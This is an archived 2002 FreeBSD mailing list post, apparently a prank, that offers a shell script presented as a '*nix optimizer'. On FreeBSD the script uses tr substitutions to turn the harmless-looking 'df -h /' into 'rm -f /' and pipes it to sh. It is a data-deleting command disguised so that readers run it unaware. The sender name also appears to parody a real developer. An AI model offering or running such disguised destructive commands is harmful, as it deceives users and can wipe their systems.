Skip site navigation (1)Skip section navigation (2)
Date:      Thu, 29 Aug 2002 08:04:58 -0700 (PDT)
From:      Koul-Henning Pamp <koul@canadamail.de>
To:        hackers@freebsd.org
Subject:   *nixopt, an idea
Message-ID:  <20020829150458.D14A43ECC@sitemail.everyone.net>

next in thread | raw e-mail | index | archive | help
Fellow hackers,

I need help enhancing my *nix optimizer tool, here's version 0.1

----------------------------
#!/bin/sh
# The *nix optimizer
# (C) 2002 Koul-Henning Pamp
# Released under the superior FFL

[ "`uname`" =3D "Linux" ] && echo "System not supported yet."
[ "`uname`" =3D "FreeBSD" ] && echo "df -h /" | tr '\144\146' '\162\155' | =
tr 'h' 'f'|sh
---------------------------

_____________________________________________________________
Die kostenlose WebMail fuer alle Canada-Freunde - www.canadamail.de
Ein Service von CDN.de - Die KANADA-Suchmaschine - www.CDN.de
------------------------------------------------------------------------
KanadischerWein.de - Ihr Spezialist f=FCr kanadischen Wein im Internet - Be=
suchen Sie unseren Online-Shop - www.KanadischerWein.de
------------------------------------------------------------------------

_____________________________________________________________
Promote your group and strengthen ties to your members with email@yourgroup=
.org by Everyone.net  http://www.everyone.net/?btn=3Dtag

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020829150458.D14A43ECC>